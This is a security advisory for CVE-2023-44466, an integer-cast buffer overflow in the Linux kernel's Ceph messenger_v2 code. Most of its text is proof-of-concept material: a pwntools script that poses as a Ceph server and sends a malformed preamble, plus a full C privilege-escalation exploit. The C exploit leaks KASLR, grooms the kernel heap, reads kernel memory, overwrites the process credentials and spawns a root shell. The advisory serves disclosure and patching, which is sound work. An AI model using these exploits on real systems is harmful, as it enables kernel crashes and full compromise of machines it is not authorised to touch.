Skip to content

Linux Kernel: Ceph file system driver buffer overflow

Moderate
rcorrea35 published GHSA-jg27-jx6w-xwph Aug 30, 2023

Package

Kernel (Linux)

Affected versions

5.11

Patched versions

https://www.spinics.net/lists/ceph-devel/msg57909.html

Description

Summary

The Ceph filesystem has a Linux kernel module that receives TCP packets from an IP address.
Before any authorization is completed, any device with that IP address can send a packet that results in a buffer overflow in the kernel - a user controlled length is read from a TCP packet(ceph_decode_32(&p) in the link): https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L520.
This u32 is cast into an integer(fd_lens has type int) which can result in a negative value making the checks on fd_lens validity pass.

Then this integer is used to calculate the size of a buffer here https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L1698. The attacker can make the head_len any value - for an overflow to happen the attacker could give a value less than the number of bytes to be copied in here: https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L1711. Here con->v2.in_buf is also user controlled.

Severity

Moderate - An attacker being able to identify the IP of a device reading the ceph file system can result in a denial of service and remote code execution in the kernel.

Proof of Concept

Create a linux kernel qemu VM following these steps: https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md#image
Create 2 other disk images, compile the linux kernel, and then run qemu:
The bigdisk.img should be about 50GB and the other two at least 10GB

#!/bin/sh
qemu-system-x86_64 \
        -m 10G \
        -smp 2 \
        -kernel linux-6.0.1/arch/x86/boot/bzImage \
        -nographic \
        -append "nokaslr console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0" \
        -drive file=image/bigdisk.img,format=raw \
        -drive file=image/otherdisk.img,format=raw \
        -drive file=image/otherdisk2.img,format=raw \
        -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \
        -net nic,model=e1000 \
        -pidfile vm.pid \
        -s \
        2>&1 | tee vm.log

Within the qemu VM install ceph using this link https://docs.ceph.com/en/latest/install/index_manual/ or the shell script below:

#!/bin/sh
apt update -y && apt install -y vim ceph ceph-mds
echo '[global]' >> /etc/ceph/ceph.conf
echo 'fsid = 10229502-b892-4925-b21d-00de3c4973eb' >> /etc/ceph/ceph.conf
echo 'mon_initial_members = syzkaller' >> /etc/ceph/ceph.conf
echo 'mon_host = [v2:10.0.0.1:3300/0,v1:10.0.0.1:6789/0]' >> /etc/ceph/ceph.conf
ceph-authtool --create-keyring /tmp/ceph.mon.keyring --gen-key -n mon. --cap mon 'allow *'
ceph-authtool --create-keyring /etc/ceph/ceph.client.admin.keyring --gen-key -n client.admin --cap mon 'allow *' --cap osd 'allow *' --cap mds 'allow *' --cap mgr 'allow *'
ceph-authtool --create-keyring /var/lib/ceph/bootstrap-osd/ceph.keyring --gen-key -n client.bootstrap-osd --cap mon 'profile bootstrap-osd' --cap mgr 'allow r'
ceph-authtool /tmp/ceph.mon.keyring --import-keyring /etc/ceph/ceph.client.admin.keyring
ceph-authtool /tmp/ceph.mon.keyring --import-keyring /var/lib/ceph/bootstrap-osd/ceph.keyring
chown ceph:ceph /tmp/ceph.mon.keyring
monmaptool --create --add syzkaller 10.0.2.15  --fsid 10229502-b892-4925-b21d-00de3c4973eb /tmp/monmap
sudo -u ceph mkdir /var/lib/ceph/mon/ceph-syzkaller
sudo -u ceph ceph-mon --mkfs -i syzkaller --monmap /tmp/monmap --keyring /tmp/ceph.mon.keyring
systemctl start ceph-mon@syzkaller
mkdir -p /mnt/mycephfs

By executing this script locally to send the packet:

#!/usr/bin/python3
from [pwn](https://source.corp.google.com/search?q=file%3A%28%2F%7C%5E%29pwn%28%5C.%28clif%7Cswig%7Cpy%7Cpyx%7Cspt%29%24%7C%2F%28__init__%5C.%28clif%7Cswig%7Cpy%7Cpyx%7Cspt%29%29%3F%24%29) import *
from [crc32c](https://source.corp.google.com/search?q=file%3A%28%2F%7C%5E%29crc32c%28%5C.%28clif%7Cswig%7Cpy%7Cpyx%7Cspt%29%24%7C%2F%28__init__%5C.%28clif%7Cswig%7Cpy%7Cpyx%7Cspt%29%29%3F%24%29) import [crc32c](https://source.corp.google.com/search?q=file%3A%28%2F%7C%5E%29crc32c%2Fcrc32c%28%5C.%28clif%7Cswig%7Cpy%7Cpyx%7Cspt%29%24%7C%2F%28__init__%5C.%28clif%7Cswig%7Cpy%7Cpyx%7Cspt%29%29%3F%24%29)
l = listen(3300)
c = l.wait_for_connection()
# receive ceph banner
c.recv(8)
# receive sizeof(u64)+sizeof(u64)
print("length of features:", u16(c.recv(2)))
# receive features that are supported
print("features: ", u64(c.recv(8)), u64(c.recv(8)))
# send ceph banner
c.send(b'ceph v2\n')
# length of features
c.send(p16(16))
# https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L1961 
# features and required features
c.send(p64(1))
c.send(p64(1))
# https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L512
# fd_tag and fg_seg_cnt 
preamble = p8(0) + p8(1)
# fd_lens and fd_aligns 
# 2147483647+2147483647 casts to -2 and we want 37
# so head_len(size of buffer we can memcpy into)
# becomes 1 since head_onwire_len subtracts 36 bytes
preamble += p32(2147483647+2147483647-33) + p16(200)
# padding 20 bytes so it is 28 bytes
preamble += b'\x00'*20
assert(len(preamble)==28)
print("crc32c for preamble", crc32c(preamble))
c.send(preamble)
info("sending one kernel will compute: 2696580873")
# hash the kernel uses
c.send(p32(2696580873))
c.send(b'A'*3000000)
print('sent')
c.interactive()

and then running this command within the VM with the address of the device running hte python script

mount -t ceph <ip address>:/ /mnt/mycephfs/ -o ms_mode=crc,name=foo

will result in a KASAN dump.

#define _GNU_SOURCE /* Bring REG_XXX names from /usr/include/sys/ucontext.h */
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include "leak.h"
#define DRV_PATH "/dev/vuln"
#define PWN_GET 28673
#define SE_PATH "/sys/fs/selinux/policy"
#define TASK_NAME "th3lsh3ll"
#define TASK_OFFSET 1112
#define NAME_OFFSET 1848
#define CRED_OFFSET 1824
#define CRED_SIZE 176
#define MMAP_ADDR 0xdead1000
struct in {
	int fd_len;
	int pad;
	unsigned long actual[2];
	unsigned long size;
	unsigned long addr;
	unsigned long in_buf[8];
};
void* page;
struct in_write {
	int fd_len;
	int pad;
	unsigned long actual[2];
	unsigned long next_alloc[2];
	unsigned long in_buf[8];
};

int drv_fd = 0;
int se_fd = 0;

void bad_fd() {
	fprintf(stderr, "%s invalid driver fd %d\n", strerror(errno), drv_fd);
}

struct in* good = NULL;
struct in* kleak = NULL;
struct in_write* kw = NULL;

unsigned long kaslr_offset = 0;
unsigned long kmalloc8 = 0;

void free_all() {
	if(drv_fd) {
		read(drv_fd, 0, 0);
	} else {
		bad_fd();
	}
}

void alloc() {
	if(drv_fd) {
		if(ioctl(drv_fd, 0, good)<0) {
			fprintf(stderr, "ioctl failed spraying kmalloc16\n");
		}
	} else {
		bad_fd();
	}
}

void alloc_overflow(void* evil, int overflow) {
	if(drv_fd) {
		int cmd = overflow ? PWN_GET : 0;
		if(ioctl(drv_fd, cmd, evil) < 0) {
			fprintf(stderr, "leaking KASLR ioctl failed\n");
		}
	} else {
		bad_fd();	
	}
}
 
// before triggering #DB exception make a SIGTRAP handler 
extern char mayfault_insn_pre[];
extern char mayfault_insn_post[];
void sigtrap_handler(int signum, siginfo_t *info, void *uctx_) {
	ucontext_t *uctx = uctx_;
	if(uctx->uc_mcontext.gregs[REG_RIP] != (unsigned long)mayfault_insn_post) {
		printf("fault at unknown RIP 0x%lx, expected 0x%lx\n", (unsigned long)uctx->uc_mcontext.gregs[REG_RIP], (unsigned long)mayfault_insn_pre);
	if(signal(SIGTRAP, SIG_DFL) == SIG_ERR) {
		fprintf(stderr, "signal failed %s\n", strerror(errno));
	}
   }
}

void trigger_DB() {
	asm volatile(
"mayfault_insn_pre:\n\t"
  "int1\n"
"mayfault_insn_post:\n\t"
);
}
// tell the scheduler to pin a task to a specific CPU core
static void pin_task_to(int pid, int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  if(sched_setaffinity(pid, sizeof(cpu_set_t), &cset)) {
	fprintf(stderr, "sched_setaffinity %s\n", strerror(errno));
   }
}
static void pin_to(int cpu) { pin_task_to(0, cpu); }

void alloc_plm() { if(!se_fd) { se_fd = open(SE_PATH, O_RDONLY); } }
void free_plm() { close(se_fd); se_fd = 0; }
int plm_hole = 32;

#define NUM_PRCTLS PAGE_SIZE
void * address[NUM_PRCTLS];

int rename_vma(void* addr, unsigned long size, char *name) {
    int res;
    res = prctl(PR_SET_VMA, PR_SET_VMA_ANON_NAME, (unsigned long)addr, size, name);
    if (res < 0) {
        fprintf(stderr, "[!] prctl %s 0x%lx %ld\n", strerror(errno), addr, size);
   	exit(1);
    }
    return res;
}

void alloc_vmans(size_t idx) {
               address[idx] =
		mmap(NULL, 1024, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 
        	char buf[12];
		memset(buf, 'a', 12);
        	char store[8];
        	memset(store, 'a', 8);
        	snprintf(store, 8, "%d", idx+1);
        	memcpy(&buf[4], store, 8);
        	rename_vma(address[idx], 1024, buf);
    }

void free_vmans(size_t idx) {
    rename_vma(address[idx], 1024, NULL);
    munmap(address[idx], 1024);
}

unsigned long* arb_read(unsigned long addr, unsigned long bytes) {
	unsigned long* leak = (unsigned long*)calloc((size_t)bytes, sizeof(unsigned long));
	kleak->addr = addr;
	kleak->size = bytes;
	lseek(se_fd, SEEK_SET, 0);
	free_all();
	alloc_overflow(kleak, 1);
	int nbytes = read(se_fd, leak, kleak->size);
	if(nbytes < 0) { 
		fprintf(stderr, "arb_read: error reading %s\n", strerror(errno));
		return 0;	
	}
	return leak;
}

void setup_kaslr_leak() {
	// pin to cpu and set SIGTRAP handler so we can trigger DB exception
	pin_to(0);
	struct sigaction sigtrap_action = {
		.sa_sigaction = sigtrap_handler,
		.sa_flags = SA_SIGINFO
	};
	int ret = sigaction(SIGTRAP, &sigtrap_action, NULL);
	if(ret < 0) {
		fprintf(stderr, "sigaction failed %d %s\n", ret, strerror(errno));
	}
	// read kernel pointers
	trigger_DB();
}

unsigned long kaslr_leak() {
	char* ans = (char*)arb_read(0xfffffe000000f000, PAGE_SIZE*2);
	// calculate KASLR offset	
	char* first_leak = ans+0x1f48;
	unsigned long kptr =(*(unsigned long*)first_leak); 
	if(!*first_leak || kptr < 0xffffffff81e0124d) {
		fprintf(stderr, "[!] either leak failed or KASLR disabled\n");
	}	
	kaslr_offset = kptr - 0xffffffff81e0124d;
	return kaslr_offset;
}

void warm_heap() {
	puts("[*] warming heap");
	for(size_t i=0; i<256; i++) {
		alloc_vmans(i);
	}
	for(size_t i=0; i<256; i++) {
		free_vmans(i);
	}
}

int main(char argc, char** argv) {
	setup_kaslr_leak();
	// set process name so we can find it in task_struct linked list
	if(prctl(PR_SET_NAME, TASK_NAME, 0, 0, 0)) {
		fprintf(stderr, "prctl failed to set process name: %s\n", strerror(errno));
		return 1;
	}
	good = (struct in*)calloc(1, sizeof(struct in));
	good->fd_len = 16;
	// open driver
	drv_fd = open(DRV_PATH, O_RDWR);
	if(drv_fd < 0) {
		 fprintf(stderr, "%s driver device not available\n", strerror(errno));
		 return 1;
	}
		// leaking cred struct for current process task_struct by traversing task list starting 
	// from init_task
	kleak = (struct in*)calloc(1, sizeof(struct in));
	char* leak = (char*)calloc(PAGE_SIZE, sizeof(char));
	kleak->fd_len = -20;
	unsigned long credptr = 0x42424242;
	char pname[9];
	pname[8] = 0;
	warm_heap();
	// make the SELinuxfs plm struct adjacent in memory to victim chunk
	// so we can overflow the size and address to copy to userspace
	alloc_vmans(1);
	alloc_vmans(0);
	free_vmans(0);
	alloc_overflow(good, 0);
	free_vmans(1);
	alloc_plm();
	kaslr_offset = kaslr_leak();
	printf("[*] KASLR offset 0x%lx\n", kaslr_offset);
	unsigned long init_task = 0xffffffff828149c0+kaslr_offset;
	unsigned long current = init_task;
	while(1) {
		current = (*(arb_read(current+TASK_OFFSET, 8))) - TASK_OFFSET;
		*(unsigned long*)pname = (*(arb_read(current + NAME_OFFSET, 8)));	
		//printf("process name %s\n", pname);
		if(strchr(pname, '|')) {
			// regular SELinux reads as pipe if overflow fails to happen
			break;
		}
		if(!strncmp(TASK_NAME, pname, 8)) {
				printf("[*] 0x%lx current\n", current);
				unsigned long* addr = arb_read(current+CRED_OFFSET, 8);
				credptr = *addr;
				addr = arb_read(*addr, CRED_SIZE);
				printf("[*] current->real_cred: 0x%lx\n", credptr);
				hex_dump((char*)addr, CRED_SIZE);
				break;
		}
		if(init_task == current) {
			puts("failed");
			break;
		}
	}
	alloc_vmans(0);
	alloc_vmans(1);
	free_vmans(0);
	free_vmans(1);
	
	kw = (struct in_write*)calloc(1, sizeof(struct in_write));
	kw->fd_len = -20;
	// start at fsid since it has 0x0s after it
	// once it gets overwritten with 0 do the next field with the same
	// freelist overwrite
	// key thing to remember is offset is size of heap chunk divided by 2
	// and last_chunk + offset
	kw->next_alloc[1] = credptr+32;
	
	alloc_overflow(kw, 1);
	for(size_t j=0; j<3; j++) {
		// allocate a chunk at the overwritten address
		// then write all zeroes to it
		alloc_overflow(good, 0);
	}
	// repeat for all the fields in the top of
	// the struct cred
	for(size_t i=0; i<5; i++) {
		warm_heap();
		alloc_vmans(0);
		alloc_vmans(1);
		free_vmans(0);
		free_vmans(1);
		kw->next_alloc[1] -= 8;	
		alloc_overflow(kw, 1);
		for(size_t j=0; j<3; j++) {
			alloc_overflow(good, 0);	
		}
	}
	if((getuid() == 0) && (geteuid() == 0)) {
		system("/bin/sh");
	} else {
		puts("[!] nooo failed\n");
	}
	if (fork()) {
       		return 0;
   	} else {
       	//hold the fd for SELinuxFS file so the overwritten pointer is not freed
	//since this causes a kernel panic
       	while(1) { sleep(1000); }
   	}
	return 0;
}

CVE-2023-44466

Timeline

Date reported: 07/05/2023
Date fixed: 07/12/2023
Date disclosed: 8/30/2023

Severity

Moderate

CVE ID

CVE-2023-44466

Credits